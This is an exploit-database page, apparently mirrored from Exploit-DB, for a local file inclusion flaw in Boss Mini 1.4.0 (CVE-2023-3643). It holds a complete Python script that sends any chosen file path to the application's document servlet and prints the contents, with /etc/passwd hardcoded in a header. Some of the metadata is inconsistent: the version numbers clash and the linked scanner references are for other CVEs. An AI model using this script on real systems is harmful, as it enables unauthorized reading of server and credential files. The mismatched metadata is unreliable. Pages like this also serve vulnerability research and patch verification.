header-logo
Suggest Exploit
vendor:
Boss Mini
by:
nltt0
8.1
CVSS
CRITICAL
Local File Inclusion
22
CWE
Product Name: Boss Mini
Affected Version From: 1.4.2000
Affected Version To: 1.4.2000
Patch Exists: NO
Related CWE: CVE-2023-3643
CPE: a:boss_mini:boss_mini:1.4.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2021-3643/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=50904https://www.infosecmatter.com/nessus-plugin-library/?id=154954https://www.infosecmatter.com/nessus-plugin-library/?id=101979https://www.infosecmatter.com/nessus-plugin-library/?id=51658https://www.infosecmatter.com/nessus-plugin-library/?id=104650https://www.infosecmatter.com/nessus-plugin-library/?id=104205https://www.infosecmatter.com/nessus-plugin-library/?id=119112https://www.infosecmatter.com/nessus-plugin-library/?id=121765https://www.infosecmatter.com/nessus-plugin-library/?id=111896https://www.infosecmatter.com/nessus-plugin-library/?id=121098
Platforms Tested:
2023

Boss Mini 1.4.0 – Local File Inclusion

The exploit allows an attacker to include files from the local file system on the Boss Mini 1.4.0 application. By exploiting this vulnerability, an attacker can potentially access sensitive files and data stored on the server. This vulnerability has been assigned CVE-2023-3643.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input to prevent malicious file inclusions. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
Source

Exploit-DB raw data:

# Exploit Title: Boss Mini 1.4.0 - local file inclusion
# Date: 07/12/2023
# Exploit Author: [nltt0] (https://github.com/nltt-br))
# CVE: CVE-2023-3643


'''
 _____       _                              _____ 
/  __ \     | |                            /  ___|
| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. 
| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
 \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ 
                            __/ |                 
                           |___/                  

'''

from requests import post 
from urllib.parse import quote
from argparse import ArgumentParser

try:
    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
    parser.add_argument('--domain', required=True, help='Application domain')
    parser.add_argument('--file', required=True, help='Local file')

    args = parser.parse_args()
    host = args.domain
    file = args.file
    url = '{}/boss/servlet/document'.format(host)
    file2 = quote(file, safe='')

    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
    }


    data = {
        'path': file2
    }

    try:
        req = post(url, headers=headers, data=data, verify=False)
        if req.status_code == 200:
            print(req.text)

    except Exception as e:
        print('Error in {}'.format(e))   
       

except Exception as e:
    print('Error in {}'.format(e))

Navigation

Suggest Exploit

Services By CQR